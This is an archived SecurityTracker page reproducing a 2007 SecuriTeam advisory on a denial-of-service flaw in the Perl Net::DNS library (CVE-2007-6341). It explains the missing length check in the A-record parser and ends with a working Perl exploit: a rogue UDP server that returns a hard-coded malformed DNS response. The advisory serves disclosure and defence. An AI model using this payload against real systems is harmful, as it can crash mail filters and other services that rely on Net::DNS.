SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Net DNS Vendors:   net-dns.org
Net::DNS Bug in Processing DNS Response Packets Lets Remote Users Deny Service
SecurityTracker Alert ID:  1019104
SecurityTracker URL:  http://securitytracker.com/id/1019104
CVE Reference:   CVE-2007-6341   (Links to External Site)
Date:  Dec 17 2007
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.60 build 654; possibly other versions
Description:   A vulnerability was reported in Net::DNS. A remote user can cause denial of service conditions.

A remote user can send specially crafted DNS response to potentially cause the target service to crash.

The vulnerability resides in 'Net/DNS/RR/A.pm'.

The vendor was notified on October 28, 2007.

Beyond Security reported this vulnerability, detected by beSTORM.

Impact:   A remote user can cause an application using Net::DNS to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.net-dns.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [UNIX] Net::DNS Malformed Packet DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Net::DNS Malformed Packet DoS
------------------------------------------------------------------------


SUMMARY

 <http://www.net-dns.org/> Net::DNS is "a DNS resolver implemented in 
Perl. It allows the programmer to perform nearly any type of DNS query 
from a Perl script". beSTORM's DNS Server module has been able to detect a 
vulnerability in Net::DNS allows a malicious server to cause the Net::DNS 
package to crash by sending it a malformed DNS response, this in turn 
would cause any product using the package to crash with it.

DETAILS

Vulnerable Systems:
 * Net::DNS version 0.60 build 654

It is possible to cause Net::DNS to "croak" by responding to it with a 
malformed DNS response.

The croak itself doesn't allow you to overflow or execute arbitrary code, 
but as it cannot be captured using normal Perl code - as with an eval() 
function for example - a user of the Net::DNS package can be caused to 
"crash", his program to forcefully terminate if it encounters this DNS 
response.

The problem steams from the fact that:
if ($self->{"rdlength"} > 0) {
$self->{"address"} = inet_ntoa(substr($$data, $offset, 4));
}

found in Net/DNS/RR/A.pm

Doesn't properly verify that $$data has 4 bytes to read before attempting 
to substr - which in turn causes the data sent to inet_ntoa to not have 
enough bytes which causes this code:
ip_address = SvPVbyte(ip_address_sv, addrlen);
if (addrlen == sizeof(addr) || addrlen == 4)
addr.s_addr =
(ip_address[0] & 0xFF) << 24 |
(ip_address[1] & 0xFF) << 16 |
(ip_address[2] & 0xFF) << 8 |
(ip_address[3] & 0xFF);
else
croak("Bad arg length for %s, length is %d, should be %d", 
"Socket::inet_ntoa", addrlen, sizeof(addr));

To issue a "croak" - causing the perl to abort.

Severity:
The vulnerability itself doesn't pose any problem as Socket::inet_ntoa 
handles it as expected, seriousness of this vulnerability is caused by the 
fact that several other packages such as SpamAssassin and OTRS rely on 
Net::DNS for resolving hostnames - this could at the very least be a 
nuisance where an attacker can crash the daemons run by these two 
programs.

Vendor status:
We have reported this issue to Net::DNS 6 weeks ago:  
<https://rt.cpan.org/Public/Bug/Display.html?id=30316> Security issue with 
Net::DNS::Resolver, but no response has been received.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341> 
CVE-2007-6341

Exploit:
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module

use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die 
"socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";

my $oldmsg = 
"\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
 my($port, $ipaddr) = sockaddr_in($sock->peername);
 $hishost = gethostbyaddr($ipaddr, AF_INET);
 print "Client $hishost said ``$newmsg''\n";
 $sock->send($oldmsg);
 $oldmsg = "[$hishost] $newmsg";
}
die "recv: $!";


ADDITIONAL INFORMATION

The information has been provided by beSTORM.
The original article can be found at:  
<http://www.beyondsecurity.com/bestorm_overview.html> 
http://www.beyondsecurity.com/bestorm_overview.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC